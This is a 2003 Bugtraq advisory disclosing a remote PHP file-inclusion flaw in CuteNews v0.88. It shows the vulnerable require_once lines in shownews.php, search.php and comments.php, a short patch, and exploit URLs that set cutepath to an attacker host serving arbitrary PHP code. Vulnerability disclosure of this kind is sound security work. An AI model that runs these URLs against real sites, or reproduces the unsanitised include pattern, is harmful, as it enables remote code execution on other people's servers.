Bugtraq mailing list archives
PHP code injection in CuteNews
From: "Over_G" <overg () mail ru>
Date: Tue, 25 Feb 2003 14:31:55 +0300
PHP source code injection in CuteNews Informations : =============================================== Script : CuteNews v0.88 Offical site : http://air.langame.net/ =============================================== PHP Scripts : =============================================== shownews.php : if(!$cutepath) $cutepath="."; require_once("$cutepath/config.php"); {.........} $all_news=file("$cutepath/news.txt"); =============================================== search.php : require_once("$cutepath/config.php"); =============================================== comments.php : if(!$cutepath){$cutepath=".";} require_once("$cutepath/config.php"); =============================================== Exploits : http://[VICTIM]/cutenews/shownews.php?cutepath=http://[ATTACKER]/ http://[VICTIM]/cutenews/search.php?cutepath=http://[ATTACKER]/ http://[VICTIM]/cutenews/comments.php?cutepath=http://[ATTACKER]/ with : http://[ATTACKER]/config.php http://[ATTACKER]/news.txt Content config.php or news.txt: Any PHP Code. =============================================== Patch : Replace if(!$cutepath){$cutepath=".";} require_once("$cutepath/config.php"); on $cutepath="."; =============================================== Best Regards, Over_G [DWC Gr0up] and VenoM Please visit: www.DWCgr0up.com www.OverG.com www.hack-tools.org Mail: OverG () mail ru VenoM88 () mail ru
Current thread:
- PHP code injection in CuteNews Over_G (Feb 25)
- <Possible follow-ups>
- Re: PHP code injection in CuteNews Steve Grubb (Feb 28)